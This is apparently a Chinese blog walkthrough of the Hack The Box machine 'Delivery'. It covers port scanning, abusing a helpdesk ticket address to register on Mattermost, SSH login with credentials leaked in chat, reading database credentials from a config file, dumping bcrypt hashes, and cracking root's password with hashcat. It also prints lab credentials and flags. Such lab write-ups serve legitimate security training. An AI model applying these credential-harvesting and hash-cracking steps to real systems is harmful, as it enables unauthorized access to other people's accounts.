Delivery-htb-writeup

0x00 靶场技能介绍

章节技能:网站功能性缺陷分析、两个网站功能存在交互利用、内部通讯平台泄露账号密码及默认密码登信息、网站配置文件敏感信息泄露、数据库用户密码hashcat破解

参考链接:https://www.youtube.com/watch?v=HqGKuHfoRIQ

参考链接:https://0xdf.gitlab.io/2021/05/22/htb-delivery.html

参考链接:https://khaoticdev.net/hack-the-box-delivery/

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.222

2、这个靶场相较于前面的几个靶场,漏洞方面出现了很大的不同,导致我卡了很久的思路,直到看了wp才知道如何做这个题。

3、通过端口扫描,发现开放了以下几个端口信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
sudo nmap -sT -sV -sC -O -p"22,80,8065," "10.10.10.222"

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sun, 10 Dec 2023 13:24:12 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: ty17t6tc17b9tktyw18m7gphdo
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sun, 10 Dec 2023 13:31:36 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sun, 10 Dec 2023 13:31:36 GMT
|_    Content-Length: 0

4、80端口是一个提示性的网站

5、通过80端口我们发现了2个域名信息:delivery.htb 与 helpdesk.delivery.htb ,这里本地绑定下hosts

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.222 helpdesk.delivery.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.222 helpdesk.delivery.htb

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.222 delivery.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.222 delivery.htb

6、8065端口是一个Mattermost系统平台平台本身未发现漏洞。

7、而 helpdesk.delivery.htb 是一个票据的网站,通过结合现有各种尝试的信息,Mattermost平台需要注册,但是只有使用 @delivery.htb 的域名是有用的,而票据网站,可以读取到 @delivery.htb 域名邮箱的相关信息,至此漏洞产生了。

8、通过票据网站,我们生成一个问题工单来获取 @delivery.htb 域名的相关信息。

1
2
3
4
5
6
7
8
9
test, 

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 5993601.

If you want to add more information to your ticket, just email 5993601@delivery.htb.

Thanks,

Support Team

9、通过上述的票据码查看当前工单邮件的会话情况

10、然后去 Mattermost 网站上注册个 5993601@delivery.htb 账号,并点击发送验证码邮件信息

1
http://10.10.10.222:8065/should_verify_email?email=5993601%40delivery.htb

11、发送验证码后,继续返回查看工单回显情况

12、至此,我们成功获取到注册的链接信息,点击链接激活后,并登录Mattermost平台

13、通过查看首页内部的信息,我们获取到了2条有用的信息

1
2
3
4
5
初始接入点的ssh账号密码:
maildeliverer:Youve_G0t_Mail!

许多账号密码规律的特征初始密码:
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"

14、我们登录第一个 maildeliverer 账号,成功获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/桌面]
└─$ ssh maildeliverer@10.10.10.222
The authenticity of host '10.10.10.222 (10.10.10.222)' can't be established.
ED25519 key fingerprint is SHA256:AGdhHnQ749stJakbrtXVi48e6KTkaMj/+QNYMW+tyj8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.222' (ED25519) to the list of known hosts.
maildeliverer@10.10.10.222's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ cat /home/maildeliverer/user.txt
d7ca1583e91db305a765fc0ee6c3b21e
maildeliverer@Delivery:~$

0x02 系统权限获取

15、通过不断的枚举,在 mattermost 平台的源码目录下,发现了数据库的配置信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
maildeliverer@Delivery:~$ 
maildeliverer@Delivery:~$ cd /opt
maildeliverer@Delivery:/opt$ ls -la
total 12
drwxr-xr-x  3 root       root       4096 Jul 14  2021 .
drwxr-xr-x 19 root       root       4096 Jul 14  2021 ..
drwxrwxr-x 12 mattermost mattermost 4096 Jul 14  2021 mattermost
maildeliverer@Delivery:/opt$ cd mattermost/
maildeliverer@Delivery:/opt/mattermost$ ls -la
total 288
drwxrwxr-x 12 mattermost mattermost   4096 Jul 14  2021 .
drwxr-xr-x  3 root       root         4096 Jul 14  2021 ..
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18  2020 bin
drwxrwxr-x  7 mattermost mattermost   4096 Dec 26  2020 client
drwxrwxr-x  2 mattermost mattermost   4096 Dec 26  2020 config
drwxrwxr-x  3 mattermost mattermost   4096 Dec 10 08:24 data
-rw-rw-r--  1 mattermost mattermost   2052 Dec 18  2020 ENTERPRISE-EDITION-LICENSE.txt
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18  2020 fonts
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18  2020 i18n
drwxrwxr-x  2 mattermost mattermost   4096 Dec 26  2020 logs
-rw-rw-r--  1 mattermost mattermost    898 Dec 18  2020 manifest.txt
-rw-rw-r--  1 mattermost mattermost 229264 Dec 18  2020 NOTICE.txt
drwxr--r--  5 mattermost mattermost   4096 Dec 10 08:31 plugins
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18  2020 prepackaged_plugins
-rw-rw-r--  1 mattermost mattermost   6262 Dec 18  2020 README.md
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18  2020 templates
maildeliverer@Delivery:/opt/mattermost$ cd config/
maildeliverer@Delivery:/opt/mattermost/config$ ls -la
total 36
drwxrwxr-x  2 mattermost mattermost  4096 Dec 26  2020 .
drwxrwxr-x 12 mattermost mattermost  4096 Jul 14  2021 ..
-rw-rw-r--  1 mattermost mattermost   922 Dec 18  2020 cloud_defaults.json
-rw-rw-r--  1 mattermost mattermost 18774 Dec 10 08:24 config.json
-rw-rw-r--  1 mattermost mattermost   243 Dec 18  2020 README.md
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json

{

"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",

}

16、通过连接该数据库我们发现了被加密的 root 的密码hash值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 196
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
| ChannelMembers         |
| Channels               |
| ClusterDiscovery       |
| CommandWebhooks        |
| Commands               |
| Compliances            |
| Emoji                  |
| FileInfo               |
| GroupChannels          |
| GroupMembers           |
| GroupTeams             |
| IncomingWebhooks       |
| Jobs                   |
| Licenses               |
| LinkMetadata           |
| OAuthAccessData        |
| OAuthApps              |
| OAuthAuthData          |
| OutgoingWebhooks       |
| PluginKeyValueStore    |
| Posts                  |
| Preferences            |
| ProductNoticeViewState |
| PublicChannels         |
| Reactions              |
| Roles                  |
| Schemes                |
| Sessions               |
| SidebarCategories      |
| SidebarChannels        |
| Status                 |
| Systems                |
| TeamMembers            |
| Teams                  |
| TermsOfService         |
| ThreadMemberships      |
| Threads                |
| Tokens                 |
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+
46 rows in set (0.001 sec)

MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| qaz                              | $2a$10$trDVpnppobkTKLkYqfjmFuulzPIYOmGPK99tkfBRAAbxN70S/ye2i |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| test                             | $2a$10$WU.F6XBeCE4pZ1dU/e7YLevj0HHWYxinODpDRcifL/dqM9X6NmIwq |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
11 rows in set (0.001 sec)

MariaDB [mattermost]>

17、接下来就是对hash密码的破解,由于前面我们知道密码都是使用了 PleaseSubscribe! 这个类似的密码,故这里使用这个作为基础值,进行破解最终的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ echo 'root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hash

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

┌──(kali㉿kali)-[~/桌面]
└─$ echo 'PleaseSubscribe!' > passwd

┌──(kali㉿kali)-[~/桌面]
└─$ cat passwd             
PleaseSubscribe!

### 查看密码哈希值,我们观察到它们的bcrypt格式 - 用 表示$2a$。反思rootMatterMost 频道中的消息,我们也许可以使用“PleaseSubscribe!”来暴力破解密码。作为模板。为此,我们可以使用hashcat以及“best64”规则。

┌──(kali㉿kali)-[~/桌面]
└─$ hashcat -m 3200 --username 'root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' passwd -r /usr/share/hashcat/rules/best64.rule

18、通过获取到的密码,登录root账号,获取到最终的flag信息

1
2
3
4
5
maildeliverer@Delivery:/opt/mattermost/config$ su root
Password: 
root@Delivery:/opt/mattermost/config# cat /root/root.txt
fd785ce2433e677c6988165a9a0daf4b
root@Delivery:/opt/mattermost/config#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/308

打靶记
#shooting-range
Delivery-htb-writeup
https://sh1yan.top/2023/12/10/Delivery-htb-writeup/
作者
shiyan
发布于
2023年12月10日
许可协议